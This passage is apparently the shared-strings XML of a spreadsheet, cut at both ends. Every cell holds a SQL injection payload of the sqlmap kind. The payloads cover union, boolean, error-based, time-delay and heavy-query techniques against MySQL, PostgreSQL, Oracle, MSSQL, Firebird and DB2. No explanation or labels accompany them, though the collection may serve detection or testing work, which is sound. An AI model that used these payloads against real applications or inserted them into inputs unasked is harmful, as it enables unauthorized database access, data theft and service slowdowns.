    <t>select  ( case when  ( 2751 = 8206 )  then 2751 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>1 )  as svkf where 6503 = 6503 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>-2530%' order by 1#</t>
  </si>
  <si>
    <t>1%' )  and 2006 = 2006</t>
  </si>
  <si>
    <t>1" )  where 1410 = 1410</t>
  </si>
  <si>
    <t>1'|| ( select 'zeet' from dual where 9567 = 9567 and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1' in boolean mode )  or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>select count ( * )  from generate_series ( 1,5000000 )  and  ( "kngx" like "kngx</t>
  </si>
  <si>
    <t>1'  )  )   or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and   (  (  'zjnp' = 'zjnp</t>
  </si>
  <si>
    <t>-3758'  )  )   union all select 9460,9460,9460,9460,9460,9460,9460,9460--</t>
  </si>
  <si>
    <t>1"  )  )   )  and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>-9256"  )  )   union all select 2977,2977,2977,2977,2977,2977,2977--</t>
  </si>
  <si>
    <t xml:space="preserve"> ( case when 8422 = 8452 then 1 else null end ) </t>
  </si>
  <si>
    <t>1'  )  )   )  and 8162 = 1687 and   (  (   ( 'tdyr' like 'tdyr</t>
  </si>
  <si>
    <t xml:space="preserve">-2745' or elt ( 1032 = 1032,3623 ) </t>
  </si>
  <si>
    <t xml:space="preserve">1' )  and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )  </t>
  </si>
  <si>
    <t>1%"  )  )   )  union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1' where 8860 = 8860 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )  --</t>
  </si>
  <si>
    <t>1%' rlike sleep ( 5 )  and '%' = '</t>
  </si>
  <si>
    <t>1'|| ( select 'yezk' where 2097 = 2097</t>
  </si>
  <si>
    <t>1'  )  )   )  and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and   (  (   ( 'zurf' = 'zurf</t>
  </si>
  <si>
    <t>1 where 9752 = 9752</t>
  </si>
  <si>
    <t>1%" or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and "%" = "</t>
  </si>
  <si>
    <t>1 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1" )  or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and  ( "oyfk" = "oyfk</t>
  </si>
  <si>
    <t>-7637" union all select 8498,8498,8498--</t>
  </si>
  <si>
    <t>1%" union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1' )  or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1%"  )  )   and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1 )  where 1527 = 1527 or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1' in boolean mode )  or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1' and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>select  ( case when  ( 1354 = 7529 )  then 1354 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t xml:space="preserve"> select sleep ( 5 )  and "%" = "</t>
  </si>
  <si>
    <t>1%" union all select null,null,null#</t>
  </si>
  <si>
    <t>select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and   (  (   ( 'clhg' = 'clhg</t>
  </si>
  <si>
    <t>-1634%' union all select 5937,5937,5937,5937--</t>
  </si>
  <si>
    <t>1" or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and "ymwb" = "ymwb</t>
  </si>
  <si>
    <t>1" or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and "ekjs" like "ekjs</t>
  </si>
  <si>
    <t>1 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) # tsxs</t>
  </si>
  <si>
    <t>-2125"  )  )   or 8571 = 8571--</t>
  </si>
  <si>
    <t>1%" and sleep ( 5 )  and "%" = "</t>
  </si>
  <si>
    <t>1' )  or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and  ( 'lbwh' = 'lbwh</t>
  </si>
  <si>
    <t>select count ( * )  from generate_series ( 1,5000000 )  and "ihbe" like "ihbe</t>
  </si>
  <si>
    <t>1"  )  )   )  and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and   (  (   ( "opdl" = "opdl</t>
  </si>
  <si>
    <t>1'|| ( select 'kzkr' from dual where 2778 = 2778</t>
  </si>
  <si>
    <t>1'+ ( select 'hhnz' where 2465 = 2465</t>
  </si>
  <si>
    <t>select sleep ( 5 )  and 'yzix' = 'yzix</t>
  </si>
  <si>
    <t>1 or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) -- lxey</t>
  </si>
  <si>
    <t>1' )  as xbsc where 6772 = 6772</t>
  </si>
  <si>
    <t xml:space="preserve">-5268' )  where 5615 = 5615 or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( </t>
  </si>
  <si>
    <t>1'|| ( select 'neqi' where 6873 = 6873 union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1" where 5216 = 5216 or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1  )  )   union all select null,null,null#</t>
  </si>
  <si>
    <t>1%" and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t xml:space="preserve">1'  )  )   ) </t>
  </si>
  <si>
    <t>select sleep ( 5 )  and  ( 'vwmx' = 'vwmx</t>
  </si>
  <si>
    <t>1'+ ( select 'hoqt' where 4877 = 4877 or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1%"  )  )   )  or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1  )  )   )  union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>-4055'  )  )   as yoez where 3816 = 3816 or  ( 8459 = 8459 ) *4906--</t>
  </si>
  <si>
    <t>1" )  as ebvt where 5305 = 5305</t>
  </si>
  <si>
    <t>1" or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and "utzr" like "utzr</t>
  </si>
  <si>
    <t xml:space="preserve">1', ( select  ( case when  ( 9644 = 9644 )  then dbms_pipe.receive_message ( chr ( 75 ) ||chr ( 78 ) ||chr ( 104 ) ||chr ( 98 ) ,5 )  else 1/ ( select 0 from dual )  end )  from dual ) </t>
  </si>
  <si>
    <t>1" )  where 1024 = 1024 and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>-8760 )  where 8277 = 8277 union all select 8277--</t>
  </si>
  <si>
    <t>1' in boolean mode )  union all select null,null,null#</t>
  </si>
  <si>
    <t>-5420' )  union all select 2508,2508,2508,2508,2508,2508,2508#</t>
  </si>
  <si>
    <t>1"  )  )   and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (  "qycx" like "qycx</t>
  </si>
  <si>
    <t>-6775" union all select 7484,7484#</t>
  </si>
  <si>
    <t>-2803" )  union all select 5337,5337,5337,5337,5337,5337,5337#</t>
  </si>
  <si>
    <t>1%'  )  )   )  and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1%" )  union all select null,null,null--</t>
  </si>
  <si>
    <t>1 )  as wype where 6608 = 6608 or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1' and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) </t>
  </si>
  <si>
    <t xml:space="preserve">iif ( 5257 = 5257,1,1/0 ) </t>
  </si>
  <si>
    <t>1%"  )  )   )  and elt ( 9524 = 1124,1124 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>-8245"  )  )   or 3038 = 3038</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and   (  (  'ufbr' = 'ufbr</t>
  </si>
  <si>
    <t>1%'  )  )   procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>-5903%' )  union all select 8293,8293,8293,8293,8293,8293,8293,8293#</t>
  </si>
  <si>
    <t>1 )  where 2888 = 2888 or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>if ( 7340 = 9813 )  select 7340 else drop function yppp--</t>
  </si>
  <si>
    <t>1 )  or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>-7277  )  )   )  order by 1#</t>
  </si>
  <si>
    <t>1'+ ( select 'xbyn' where 6881 = 6881</t>
  </si>
  <si>
    <t>1 and 7533 = 7533# absp</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1  )  )   union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1' union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>select  ( case when  ( 3859 = 6938 )  then 3859 else 3859* ( select 3859 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>1%'  )  )   )  union all select null#</t>
  </si>
  <si>
    <t>1 and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t xml:space="preserve">1', ( select * from generate_series ( 2636,2636,case when  ( 2636 = 7071 )  then 1 else 0 end )  limit 1 ) </t>
  </si>
  <si>
    <t>select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and  ( "gzhp" = "gzhp</t>
  </si>
  <si>
    <t>1'  )  )   and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  'zcrh' = 'zcrh</t>
  </si>
  <si>
    <t>1%" )  and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and  ( "layz" = "layz</t>
  </si>
  <si>
    <t>-4811'  )  )   )  union all select 4603,4603,4603,4603,4603,4603,4603,4603,4603--</t>
  </si>
  <si>
    <t>1 )  where 4780 = 4780</t>
  </si>
  <si>
    <t>1' )  and make_set ( 9961 = 6559,6559 )  and  ( 'exde' = 'exde</t>
  </si>
  <si>
    <t>-1844' )  union all select 9572,9572,9572,9572#</t>
  </si>
  <si>
    <t>1'  )  )   )  and 7533 = 7533 and   (  (   ( 'hoyw' = 'hoyw</t>
  </si>
  <si>
    <t>1'  )  )   )  and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (   ( 'txwf' = 'txwf</t>
  </si>
  <si>
    <t>-8491" where 9043 = 9043 union all select 9043,9043,9043,9043,9043,9043,9043,9043,9043--</t>
  </si>
  <si>
    <t>1 where 8948 = 8948 and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) --</t>
  </si>
  <si>
    <t>1"  )  )   and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (  "uzbl" = "uzbl</t>
  </si>
  <si>
    <t>select pg_sleep ( 5 ) --</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual#</t>
  </si>
  <si>
    <t>1  )  )   as vzgo where 6281 = 6281 and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1%"  )  )   or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1' and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and 'qdij' = 'qdij</t>
  </si>
  <si>
    <t>-3930%"  )  )   order by 1#</t>
  </si>
  <si>
    <t>1  )  )   )  and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (   ( 3977 = 3977</t>
  </si>
  <si>
    <t>1 where 8949 = 8949 and make_set ( 8403 = 8403,8899 ) --</t>
  </si>
  <si>
    <t>-7258 or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>-2803' )  as jciy where 1130 = 1130 or make_set ( 4599 = 6550,6550 ) --</t>
  </si>
  <si>
    <t>1%' )  and 9226 = 7542--</t>
  </si>
  <si>
    <t xml:space="preserve">-8838"  )  )   as xisn where 2749 = 2749 or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) </t>
  </si>
  <si>
    <t>1'  )  )   as uvxv where 6663 = 6663 and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>-8124 )  union all select 7251,7251,7251#</t>
  </si>
  <si>
    <t>-7016%"  )  )   union all select 8847,8847,8847--</t>
  </si>
  <si>
    <t>1'  )  )   as wdor where 7426 = 7426</t>
  </si>
  <si>
    <t>1' )  as rvli where 4427 = 4427</t>
  </si>
  <si>
    <t>1'  )  )   )  and 9198 = 9198--</t>
  </si>
  <si>
    <t>1%"  )  )   )  and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>-1483' or make_set ( 9354 = 9354,7185 )  and 'qfil' = 'qfil</t>
  </si>
  <si>
    <t>1" )  where 8098 = 8098</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5' and   (  (  "ykgm" = "ykgm</t>
  </si>
  <si>
    <t>1'  )  )   as xqam where 6750 = 6750</t>
  </si>
  <si>
    <t>-7971  )  )   as armw where 9474 = 9474 or make_set ( 9354 = 9354,7185 ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1 and make_set ( 6911 = 1867,1867 ) </t>
  </si>
  <si>
    <t>1' )  where 5331 = 5331</t>
  </si>
  <si>
    <t>-4135" )  as leiz where 3582 = 3582 or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113</t>
  </si>
  <si>
    <t>1'  )  )   rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and   (  (  'trzi' = 'trzi</t>
  </si>
  <si>
    <t>1" )  where 3727 = 3727 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>1  )  )   ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and   (  (  1402 = 1402</t>
  </si>
  <si>
    <t xml:space="preserve">1, ( case when 2872 = 2872 then 1 else null end ) </t>
  </si>
  <si>
    <t>1%"  )  )   union all select null,null,null--</t>
  </si>
  <si>
    <t>1%" or sleep ( 5 )  and "%" = "</t>
  </si>
  <si>
    <t>1"  )  )   rlike  ( select  ( case when  ( 5342 = 1036 )  then 1 else 0x28 end  )  )   and   (  (  "ntdz" like "ntdz</t>
  </si>
  <si>
    <t>1' where 1895 = 1895 or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1" )  where 3058 = 3058 union all select null--</t>
  </si>
  <si>
    <t>-5250 )  where 1591 = 1591 or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --</t>
  </si>
  <si>
    <t>select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and 'bzxo' like 'bzxo</t>
  </si>
  <si>
    <t>1%"  )  )   order by 1--</t>
  </si>
  <si>
    <t>1' where 2183 = 2183</t>
  </si>
  <si>
    <t>1' or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and 'ggcm' like 'ggcm</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual ) +'</t>
  </si>
  <si>
    <t>1 or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  -- nqdb</t>
  </si>
  <si>
    <t>1' )  where 5925 = 5925 union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1  )  )   as vrev where 4248 = 4248 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 ) --</t>
  </si>
  <si>
    <t>select  ( case when  ( 9103 = 9836 )  then 9103 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>1'+ ( select 'hrxp' where 5948 = 5948</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</si>
  <si>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</si>
  <si>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 xml:space="preserve">iif ( 6369 = 5881,1,1/0 ) </t>
  </si>
  <si>
    <t>1'+ ( select wpbj where 1849 = 1849</t>
  </si>
  <si>
    <t>-7138" union all select 2341,2341,2341,2341--</t>
  </si>
  <si>
    <t>1%'  )  )   waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and   (  (  'zdkn' = 'zdkn</t>
  </si>
  <si>
    <t>1 where 6500 = 6500</t>
  </si>
  <si>
    <t>1'|| ( select 'dukt' where 3206 = 3206 or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )  )  ||'</t>
  </si>
  <si>
    <t>-2790"  )  )   as vcvw where 6075 = 6075 or 7078 = 8148--</t>
  </si>
  <si>
    <t>1'+ ( select 'vddk' where 6961 = 6961</t>
  </si>
  <si>
    <t xml:space="preserve">1 or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) </t>
  </si>
  <si>
    <t>1%" )  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and  ( "%" = "</t>
  </si>
  <si>
    <t>1 )  and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and  ( 5130 = 5130</t>
  </si>
  <si>
    <t>1' )  or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and  ( 'jmjw' like 'jmjw</t>
  </si>
  <si>
    <t>1%"  )  )   )  union all select null,null#</t>
  </si>
  <si>
    <t>1' where 4358 = 4358 union all select null,null,null,null--</t>
  </si>
  <si>
    <t>-5292' )  union all select 1439,1439,1439,1439#</t>
  </si>
  <si>
    <t>1 )  as agex where 8167 = 8167 and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )  --</t>
  </si>
  <si>
    <t>1'  )  )   rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>select  ( case when  ( 6804 = 7050 )  then 6804 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>1' in boolean mode )  union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t xml:space="preserve">iif ( 1149 = 4765,1,1/0 ) </t>
  </si>
  <si>
    <t>1%"  )  )   and 7358 = 6986--</t>
  </si>
  <si>
    <t>1" )  union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1' and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and 'fdbm' like 'fdbm</t>
  </si>
  <si>
    <t>1 )  union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-2441' union all select 1853,1853,1853,1853,1853,1853,1853--</t>
  </si>
  <si>
    <t>1 and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )  -- kvkk</t>
  </si>
  <si>
    <t>1%' )  order by 1#</t>
  </si>
  <si>
    <t>1'  )  )   as mxxd where 7255 = 7255 or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1'  )  )   )  or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (   ( 'istb' = 'istb</t>
  </si>
  <si>
    <t xml:space="preserve"> end and "xlvn" = "xlvn</t>
  </si>
  <si>
    <t>select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and '%' = '</t>
  </si>
  <si>
    <t>1'  )  )   and  ( 3020 = 3020 ) *6703 and   (  (  'pfal' = 'pfal</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1' )  where 8268 = 8268 union all select null,null,null,null--</t>
  </si>
  <si>
    <t>1'+ ( select 'yahq' where 6974 = 6974 union all select null--</t>
  </si>
  <si>
    <t>-6473' union all select 7537#</t>
  </si>
  <si>
    <t>1%"  )  )   union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>-3555' )  or make_set ( 9354 = 9354,7185 )  and  ( 'papr' = 'papr</t>
  </si>
  <si>
    <t>1 )  where 8691 = 8691 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>select  ( case when  ( 4043 = 5276 )  then 4043 else 4043* ( select 4043 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>-8013%" or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 )</t>
  </si>
  <si>
    <t>1" or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1" where 9172 = 9172 or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) --</t>
  </si>
  <si>
    <t>1%" )  union all select null,null,null#</t>
  </si>
  <si>
    <t>-5389'|| ( select 'gggl' where 1020 = 1020 union all select 1020#</t>
  </si>
  <si>
    <t xml:space="preserve">-3063%"  )  )   )  or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) </t>
  </si>
  <si>
    <t>select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4#</t>
  </si>
  <si>
    <t>1' and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and 'lwir' like 'lwir</t>
  </si>
  <si>
    <t>1  )  )   as bgdm where 3473 = 3473 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1' and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )  </t>
  </si>
  <si>
